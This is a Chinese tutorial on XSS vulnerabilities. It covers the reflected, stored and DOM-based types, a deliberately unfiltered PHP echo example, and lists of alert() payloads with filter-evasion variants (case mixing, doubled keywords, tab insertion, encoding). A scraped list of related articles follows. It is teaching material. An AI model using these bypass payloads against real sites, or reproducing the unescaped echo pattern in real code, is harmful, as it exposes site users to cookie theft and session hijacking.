XSS漏洞及其原理(详解)
文章目录
- 前言
- 一、XSS漏洞原理
- 1.概述
- 2.利用方式
- 3.执行方式
- 4.攻击对象
- 5.XSS危害
- (1)窃取cookie
- (2)未授权操作
- (3)传播蠕虫病毒
- 6.简单代码
- 7.XSS验证
- 8.
- 二、XSS漏洞分类
- 1.反射型XSS
- 原理
- 特点
- 举个栗子:
- 2.存储型XSS
- 原理
- 特点
- 3.DOM型XSS
- 原理
- 特点
- 举个栗子
- 栗子一
- 栗子二
- 简单利用
- 三、XSS payload及变形
- 1.payload构造
- (1)利用伪协议(HTML标签的属性值)
- (2)利用事件
- (3)利用CSS (只做了解)
- (4)利用【<>】构造HTML标签和标签
- 2.payload变形
- (1)大小写
- (2)双关键字
- (3)【/】代替空格
- (4)引号
- (5)Tab与回车
- (6)编码
- 总结
前言
一、XSS漏洞原理
1.概述
XSS被称为跨站脚本攻击(Cross Site Scripting),由于和层叠样式表(Cascading Style Sheets,CSS)重名,改为XSS。
主要基于JavaScript语言进行恶意攻击,因为js非常灵活操作html、css、浏览器。
2.利用方式
利用网页开发时web应用程序对用户输入过滤不足导致将恶意代码注入到网页中,使用户浏览器加载并执行恶意代码,通常是JavaScript类型,也包括java、vbs、flash、html等。
3.执行方式
用户浏览被XSS注入过的网页,浏览器就会解析这段代码,就被攻击了。因为浏览器当中有JavaScript解析器,浏览器不会判断代码是否恶意,只要符合语法规则,就直接解析了。
4.攻击对象
客户端攻击,对象大多为用户,网站管理员。
还有微博,网页留言板,聊天室等收集用户输入的地方。
5.XSS危害
(1)窃取cookie
因为大部分人喜欢将密码储存到浏览器当中,所以黑客一般渗透的时候就会先来浏览器查看已保存的cookie 来盗取各种用户账号
前面文章也提到预防xss一种方法 (传送门)
(2)未授权操作
js特性很强大,黑客会直接代替用户在html进行各类操作。比如劫持会话,刷流量,执行弹窗广告,还能记录用户的键盘输入。
(3)传播蠕虫病毒
6.简单代码
<?php
$input = $_GET["XSS"];
etho "<div>".$input."</div>";
?>
7.XSS验证
当在测试页面上提交以下代码,浏览器执行之后会出现弹窗,这是为了验证js代码是否被执行,代码被当做字符串输出在HTML页面上,浏览器当中的JavaScript解析器会根据
<script>alert(/xss/)</script> #比较常用
<script>confirm('xss')</script>
<script>prompt("xss")</script>
8.
二、XSS漏洞分类
1.反射型XSS
非持久型XSS,最容易出现的XSS漏洞。
原理
用户在请求某个URL地址时,会携带一部分数据。当客户端进行访问某条链接时,攻击者可以将恶意代码注入到URL,如果服务器端未对URL携带的参数做判断和过滤,直接返回响应页面,那么XSS攻击代码就会被一起传输到用户的浏览器,触发反射型XSS。
特点
非持久性
参数脚本
js代码在web应用的参数当中:搜索框
数据流量:浏览器---->后端---->浏览器
举个栗子:
当用户进行搜索时,返回结果通常包括用户的原始搜索内容,如果攻击者精心构造包含XSS恶意代码的链接,诱导用户点击并成功执行,用户的信息就被窃取了,甚至还可以模拟用户进行一些操作。
利用URL编码来迷惑
生成短网址,用来掩饰,造成迷惑。
2.存储型XSS
原理
被保存到服务器上,显示到HTML页面中,经常出现在用户评论的页面,攻击者将XSS代码保存到数据库中,当用户在此访问这个页面时,就会触发并执行XSS代码,窃取用户的敏感信息。
特点
危害性最大:持久的保存在服务器上
持久型XSS
js代码不在某个参数中,而是被写进了数据库或文件可以永久保存数据的介质中,如留言板等。
数据流量走向:浏览器—>后端—>数据库—>后端—>浏览器
3.DOM型XSS
首先什么是DOM? 什么又是DOM树?
移步
全称 文档对象模型(Document Object Model)
原理
基于文档对象模型(DOM)的一种漏洞。这种XSS与反射型XSS、存储型XSS有着本质的区别,它的攻击代码不需要服务器解析响应,触发XSS依靠浏览器端的DOM解析,客户端的JavaScript脚本可以访问浏览器的DOM并修改页面的内容,不依赖服务器的数据,直接从浏览器端获取数据并执行。
特点
非持久性
数据流量:URL—>浏览器
举个栗子
document,getElementByld(“x”).innerHTML、document.write
栗子一
恶意payload:
http://localhost/dom.php?name= <img src =1 οnerrοr=> 等号后面填alert(1) 【懂得都懂】
当访问访问以上地址时,服务器返回包含上面脚本的HTML静态脚本,浏览器会把HTML文本解析成DOM
语法:οnerrοr=“SomeJavaScriptCode”
SomeJavaScriptCode:必需。规定该事件发生时执行的JavaScript。
栗子二
简单利用
<script>
var text = document.getElementByld('private_msg').innerHTML;
alert(text);
</script>
三、XSS payload及变形
1.payload构造
(1)利用伪协议(HTML标签的属性值)
<a href="javascript:alert(/xss/)">touch me !< /a>
<img src="javascript:alert('xss')"> #需在IE6测试
(2)利用事件
<img src='./smile.jpg' onmouseover='alert(/xss/)'>
<input type="text" onclick="alert(/xss/)">
(3)利用CSS (只做了解)
行内样式
<div style="background-image:url(javascript:alert(/xss/))">
页内样式
<style>Body{background-image:url(javascript:alert(/xss/))}</style>
(4)利用【<>】构造HTML标签和标签
<h1 style="color:green;">XSS</h1>
<script>alert(/xss/)</script>
2.payload变形
(1)大小写
<iMg sRc='#'Onerror="alert(/xss/)"/>
<a hREf="javaScript:alert(/xss/)">click me </a>
(2)双关键字
<scrscript>alert(/xss/)</scrscript>
(3)【/】代替空格
<img/src='#'onerror='alert(/xss/)'/>
(4)引号
在js当中可以用反引号代替单双引号,在HTML中就不需要。
<img src="#"onerror="alert(/xss/)"/>
<img src='#'onerror='alert(/xss/)'/>
<img src=# onerror=alert(/xss/)/>
<img src="#"onerror=alert('xss')/>
<img src="#"onerror=alert'xss'/>
(5)Tab与回车
在一些位置添加Tab(水平制表符)和回车符来绕过关键字检测
<img src='#'onerror ='alert(/xss/)'/>
<a href="j avascript:alert(/xss/)">click me!</a>
<A href="j
avascript:alert(/xss/)">click me!</a>
(6)编码
URL编码
%3Cscript%3Ealert(/xss/)%3C/script%3E
HTML实体编码
a 97
(a) “7”后面还有美式分号“;”
= “1”后面还有美式分号“;”
<a href="javascript:alert(/xss/)">click me!</a>
总结
声明:本文所涉及到的仅用于学习交流使用,如有其他与本人无关
XSS漏洞及其原理(详解)相关推荐
- 新浪微博的XSS漏洞攻击过程详解
今天晚上(2011年6月28日),新浪微博出现了一次比较大的XSS攻击事件.大量用户自动发送诸如:"郭美美事件的一些未注意到的细节","建 党大业中穿帮的地方" ...
- csrf漏洞防御方案_CSRF 漏洞原理详解及防御方法
跨站请求伪造:攻击者可以劫持其他用户进行的一些请求,利用用户身份进行恶意操作. 例如:请求http://x.com/del.php?id=1是一个删除ID为1的账号,但是只有管理员才可以操作,如果攻击 ...
- Web网络安全漏洞分析,SQL注入原理详解
本文主要为大家介绍了Web网络安全漏洞分析SQL注入的原理详解,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪 一.SQL注入的基础 1.1 介绍SQL注入 SQL注入就是 ...
- 计算机组织与结构poc,CPU漏洞原理详解以及POC代码分享
原标题:CPU漏洞原理详解以及POC代码分享 首先,这个漏洞已经公布近一周时间了,看到各大媒体.公众号到处在宣传,本打算不再发布类似信息,但是发现很多媒体的报道达到了一个目的--几乎所有的CPU都有漏 ...
- CRF(条件随机场)与Viterbi(维特比)算法原理详解
摘自:https://mp.weixin.qq.com/s/GXbFxlExDtjtQe-OPwfokA https://www.cnblogs.com/zhibei/p/9391014.html C ...
- 使用order by排序判断返回结果的列数,order by排序判断字段数原理详解
「作者主页」:士别三日wyx order by排序猜解列数原理详解 一.order by的两种使用方式 1)按照字段名排序 2)按照索引排序 二.order by怎么判断字段数? 1)正常的排序 3) ...
- HTTPS 加密算法原理详解
本文讲的是HTTPS 加密算法原理详解, 前言 HTTPS(全称:HyperText Transfer Protocol over Secure Socket Layer),其实 HTTPS 并不是一 ...
- sql注入的原理详解
sql注入原理详解(一) 我们围绕以下几个方面来看这个问题: 1.什么是sql注入? 2.为什么要sql注入? 3.怎样sql注入? 1.什么是sql注入? 所谓SQL注入,就是通过把SQL命令插入到 ...
- LVS原理详解(3种工作方式8种调度算法)--老男孩
一.LVS原理详解(4种工作方式8种调度算法) 集群简介 集群就是一组独立的计算机,协同工作,对外提供服务.对客户端来说像是一台服务器提供服务. LVS在企业架构中的位置: 以上的架构只是众多企业里面 ...
最新文章
- 【Java】 Java网络编程总结
- squid 安装、配置、优化
- 第三天-零基础学习python
- Leetcode-997 Find the Town Judge(找到小镇的法官)
- MVC in MFC or WTL - yinxufeng - 博客园
- 测试Spring Boot有条件的合理方式
- 【今日CV 计算机视觉论文速览 第131期】Mon, 17 Jun 2019
- php ipa 版本定制,class.php
- mysql pt_mysql管理工具之pt
- c++ extern学习
- html文件文本预处理,HTML文件文本信息预处理技术.pdf
- PRML 1.5 决策论
- 智能硬件不止树莓派,八款优秀智能硬件开源项目推荐
- C# 小数点后保留两位小数,四舍五入的函数及使用方法
- python数据分析(一):导入数据、描述统计、交叉分析、相关分析、线性回归分析
- 数据库如何修改编码格式?
- 沙龙与华为强强携手,机甲龙惊艳广州车展
- mysqldump命令备份数据 mysql备份数据
- 疯狂Java讲义(七)----第三部分
- 丰炜vb0和两台变频器的modbus rtu通信程序
热门文章
- 椭圆、双曲线、抛物线
- EasyRTMP:RTMP推流海康威视实时预览回调PS流用EasyRTMP向RTMP服务器推流中视频数据处理的代码
- html鼠标滑过导航栏变色,JavaScript实现鼠标点击导航栏变色特效
- js 计算数组的总和
- 《uniapp基础知识》学习笔记Day38-(Period2)全局文件一些常用的配置
- error LNK2019: 无法解析的外部符号 public: void __thiscall
- :focus-visible 聚焦问题
- 2018年2月16日训练日记
- [AI]算法小抄-State of GPT (Andrej Karpthy MSBuild2023 )
- php 项目 管理,PHP开源项目:文档管理_php开源项目网